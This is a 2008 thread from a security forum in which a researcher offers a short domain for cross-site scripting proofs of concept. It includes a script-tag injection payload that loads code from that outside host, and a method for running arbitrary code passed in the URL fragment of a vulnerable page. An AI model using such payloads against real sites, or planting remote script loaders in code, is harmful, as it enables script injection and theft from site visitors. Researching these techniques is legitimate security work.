Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Supershort Domain for XSS PoCs
Posted by: Anonymous User
Date: February 13, 2008 12:05PM

Hi!

I just got http://0x.lv and added a nice tool for your PoCs.

Usage:
<script src=//0x.lv></script>
will alert XSS by 0x.lv

Or you can just add code to eval via location.hash.

E.g.
URL: www.just-xssed.com/vulnerable.php#alert("XSS by me - and not 0x.lv!")
<script src=//0x.lv></script>
Will result in - guess what... an alert of XSS by me - and not 0x.lv!.


Greetings,
.mario

Options: ReplyQuote
Re: Supershort Domain for XSS PoCs
Posted by: Anonymous User
Date: February 13, 2008 12:10PM

Nice1 .mario! comes in quite handy.

Options: ReplyQuote
Re: Supershort Domain for XSS PoCs
Posted by: Gareth Heyes
Date: February 13, 2008 12:33PM

Yeah cool stuff :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Supershort Domain for XSS PoCs
Posted by: tx
Date: February 13, 2008 01:01PM

sweet, thx. :)

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: Supershort Domain for XSS PoCs
Posted by: Kenny
Date: March 20, 2008 02:14AM

nice idea

------------------
Go Hard or Go Home

Options: ReplyQuote
Re: Supershort Domain for XSS PoCs
Date: April 01, 2008 05:56PM

Thanks, will come in handy =oD

Options: ReplyQuote


Sorry, only registered users may post in this forum.